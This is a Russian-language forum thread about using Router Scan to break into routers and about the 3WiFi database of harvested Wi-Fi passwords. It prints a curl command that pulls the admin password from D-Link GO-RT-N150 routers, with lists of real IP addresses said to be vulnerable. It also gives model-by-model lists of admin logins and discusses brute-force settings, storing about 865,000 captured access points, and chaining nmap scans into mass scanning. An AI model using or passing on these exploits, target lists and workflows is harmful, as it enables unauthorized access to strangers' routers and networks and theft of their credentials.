Вот к примеру(а таких полно) : http://77.108.213.241/ - встаёт на Trying to log in [13 %], если оставляю time out 5 мин отваливается по истечении. Если устанавливаю бесконечность - выдержал около 30 мин(академический интерес). Если же пересканнировать(скажем, через минуту), - опять тот же пенёк на 7-13 %. (вру, закрывал RS принудительно, и запускал вновь ~10с, и подбор можно начинать снова, и опять затык на произвольном количестве логинов/паролей). Таймаут 5000мс(который в левом окошечке) - и так уже как для времён дайлапа. Кстати, v2.52 успевает пролетать до 57% словаря. Но в общей картине мира, та же проблема.
TCP debug поможет сдампить лог запросов. Включайте. У меня завис на 65%. Если судить по запросам, роутер отвечает на них обрезанным пакетом данных, не закрывая соединение. Отсюда и таймаут. Помогает принудительный разрыв соединения, используя Process Hacker 2. Это глючные прошивки, мне такие попадались, но очень редко. Такие устройства надо либо обновлять, если есть доступ, либо проходить мимо.
А нельзя ли сделать функцию TCP debug для всех точек из которых RS не смог вытащить нужную информацию? И вместо цифрового имени файла было название точки?) что бы потом быстро найти нужную точку) (DIR-615_193.167.1.56_8080).или это бесполезная функция?)
WR740N WR741ND WR743ND WR841N Имел с ними дело.. особо сказочные глюки с веб-мордой начинаются если подключается клиент по WIFI.(хоть это и не важно в контексте проблемы) Может, отдельный модуль написать под них(смеётся). Дело в том, что в местных(рядом со мной) сетях их полно, - когда то давно, сработала агрессивная реклама в цифровых супермаркетах. Ну да, пёс с ними...
http://rghost.ru/8qKxDW9nZ - сессии Charles ко всему этому безобразию D-Link GO-RT-N150 Сам отдаёт пароль, даже просить не надо. Я аж охренел, когда это в Charles увидел. Пример curl: Code: curl http://IP/easysetup_cmds.php -d "act=adminpsw" Spoiler: IP 37.143.226.33 37.143.226.54 37.143.226.84 37.143.226.107 46.40.91.19 46.40.94.16 46.40.107.243:8080 46.40.111.133 8level WRT-150, Netis WF-2420 Spoiler: IP http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ Linksys WRTU54G-TM, WRT54GH, WRT54GCv3, WRT54G2, WRT120N Spoiler: IP http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ LevelOne WBR-6011 Spoiler: IP http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ LevelOne WBR-6005 Spoiler: IP http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ NETGEAR WGR614v7, WGR614v8, WGR614v9, WNR834Bv2, WNR2000v2 Spoiler: IP http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080/ http://admin:[email protected]:8080 Sweex LW050v2 Spoiler: IP http://admin:[email protected]/ http://admin:[email protected]/ http://admin:[email protected]/ http://admin:[email protected]/ http://admin:[email protected]/ ZyXEL ZyAIR G-4100v2 Spoiler: IP http://admin:[email protected]/
F@st 1744, v2 F1744R_V1.25_RTC_10E admin:[email protected]:80 RS 2.53 не парсит wifi-пароль, вместо него отображает **********
Понадаедаю еще немного) а не правильней ли будет добавить в таблицу экспорта из RS дату создания листа или дату когда точка была найдена? и при загрузке в базу 3wifi учитывать не дату загрузки, а дату в созданном листе? а то получается я сканировал в мае а загружаю декабре, а в ноябре кто то сканировал эти эти же точки, с новыми паролями. (допустим с мая пароли изменили), и получается я загружаю майские точки в декабре и заменяю актуальные пароли на старые. и еще один вопрос может стоит добавить электронный ключ или пароль в экспортированную таблицу который будет проверятся на сайте при загрузке? для предотвращения фальсификации таблиц при загрузке? пока ресурс не популярный на него заходят люди которым интересно и которые хотят помочь. но когда ресурс раскрутится то с вероятностью 99,9 % появится какой не будь ГНУС который обязательно нагадит (загрузит огромную базу фальсифицированных точек) мне кажется стоит добавить кейген в RS и проверять подлиность таблиц на сайте)
Забавно, пират рассуждает об этике и морали ... Да не беги ты впереди паровоза, ещё даже не известно что из этого вырастет, и вырастет ли вообще. Мне кажется, нужно решать проблемы по мере поступления а не предсказывать их. Иначе люди занимающиеся проектом, начнут вместо настоящей работы заниматься вангованием(- Вангую !: ~~~~~~~~~)
В базе проверка на дубли идет по ключу BSSID:ESSID:KEY (плюс пара других полей). Так что точки AA:BB:CCD:EE:FF | WiFi | 12345678 AA:BB:CCD:EE:FF | WiFi | 87654321 будут считаться разными, а значит ни чего не заменится, а добавится новая запись. А при поиске по BSSID или ESSID будут отображены обе точки, ну и не составит особого труда попробовать оба пароля. Что касается ключа проверки подлинности записи - идея хорошая, но сейчас нет смысла заморачиваться. Во-первых нет гнуса портящего базу, а во-вторых планируется ввести пользователей, а тогда результаты работы гнуса легко находятся и удаляются из базы. Хочу поспорить на этот счет, но не чем. Было бы неплохо подключить какой-нибудь счетчик. У меня стоял OpenStat, посещаемость была около 20-30 человек в день и довольно быстро росла. По моим примерным оценкам сейчас она должна составлять около 200 человек в день. К тому же с тех пор сайт проиндексировался в гугле, количество точек (=интерес к базе) выросло, стабильность работы улучшена. Но это все догадки, хотелось бы увидеть реальную статистику ))
А зачем в базе 2 а то бывает доходит до 7 одинаковых точек ? если можно сохранять последнюю актуальную точку с паролем) а определяется эта точка по дате в листе который загружается в базу)
насколько я понимаю здесь идет обсуждение и предложение) и каждый может написать просьбы и предложения)я же не требую) авторам самим решать чем им заниматся) я просто делюсь мыслями вдруг будет полезна. а нет просто проигнорируют) или попросят больше не предлогать0
Ну а как определить что это та же самая точка? Если предположить (а по спецификации так и должно быть), что у каждого устройства свой MAC адрес, то всё выглядит просто - берем BSSID и говорим, что это поле должно быть уникальным. Тут же идем в статистику, смотрим таблицу "BSSID / MAC-адрес" и грустим по поводу 00:12:34:56:78:92 - 862 точки, с разными паролями, пин кодами, прошивками... Терять не хочеться, а ведь это только вершина айсберга, уникальных BSSIDов в базе 745'983, а всего точек 865'316, т.е. таким способом потеряем 119'333 точки (включая дубли). Окей, разные ESSID'ы +BSSID. А если название изменится? - один фиг дубль получится, т.е. цели не достигнем, а точки потеряем. Название устройства\прошивку в учет брать нельзя - прошивку можно и обновить, а разные версии RS могут по разному считать инфу. Предположим, что мы изобрели хитрый механизм, позволяющий точно определить дубль это или совсем другая точка. Встает другая проблема - а какая информация является актуальной? Нужно вводить в прогу RS дополнительный столбец дата, а значит отказ от поддержки старых версий RS. В итоге - чего ради? Ну лежит у нас в базе устаревшая инфа, ну занимает она не более 119'333/865'316*100%=13.8% ну и что теперь с того? Было бы это 200%, я бы еще подумал, а так это не минус - это плюс - я могу посмотреть историю изменения паролей по данной точке, и возможно мне это поможет угадать новый пароль.
Доступ к Router Scan есть у всех, следовательно делать какие-то проверки подлинности - бессмысленно. Насчёт дат загрузки, для ответственных пользователей есть галка "Не обновлять точки в базе, если ваши данные устарели". И я считаю, что хранить всю историю изменений - идеально, ибо хозяин может поменять пароль на один из ранее придуманных. Плюс товарищи из темы словарей огорчатся, если пассворды начнут пропадать.
Уважаемый @binarymaster, может сделать интеграцию с nmap? Т.е. nmap сканирует заданный диапазон, возвращает открытые ip:port, а RS уже по этому списку проходит всем свои арсеналом. Пока что пробую просто по списку IP проходить - уже в разы быстрее, а с портом в придачу было бы еще круче.
Помню, кто-то из пользователей RS когда-то использовал VNC сканер в режиме connect вместо встроенного, а потом отдавал IP-адреса на обработку программе. В результате, при большом кол-ве макс. потоков программа почти полностью съедала ресурсы и сетевой канал. Поэтому в таких юзкейсах потоков нужно ставить меньше - от 10 до 20, поскольку сканирования диапазонов как такового не осуществляется.
Я вот о чем (лог nmap) Нужно загрузить такой отчет и вычленить из него в следующем формате: Code: 91.210.25.96:21 91.210.25.96:22 91.210.25.96:23 91.210.25.96:53 91.210.25.96:80 91.210.25.96:514 91.210.25.96:2000 Ну или так: Code: 91.210.25.96:22,23,53,80,514,2000 Далее загрузить получившийся список в диапазоны для сканирования RS. Ну и добавить поддержку такого формата в RS: если есть двоеточие и список портов за ним, то сканировать только эти порты, а если просто IP без портов - то использовать список портов по умолчанию.
Не проще в таком случае использовать zmap? Тем более если быстрый интернет можно хоть весь мир просканить.
Ну хорошо, просканировавали, добавили, а у провайдера опять произошел РАЗРЫВ СВЯЗИ))))это тот чувак, что звонил в тп и орал.... для каламбура) ну в состветствии сменились ip адреса, вопрос на сколько это целесообразно, чем муторно и долго сканировать заданный диапазон по провайдеру? конечно если маленькими порциями сканировать.... тут уже спора нет.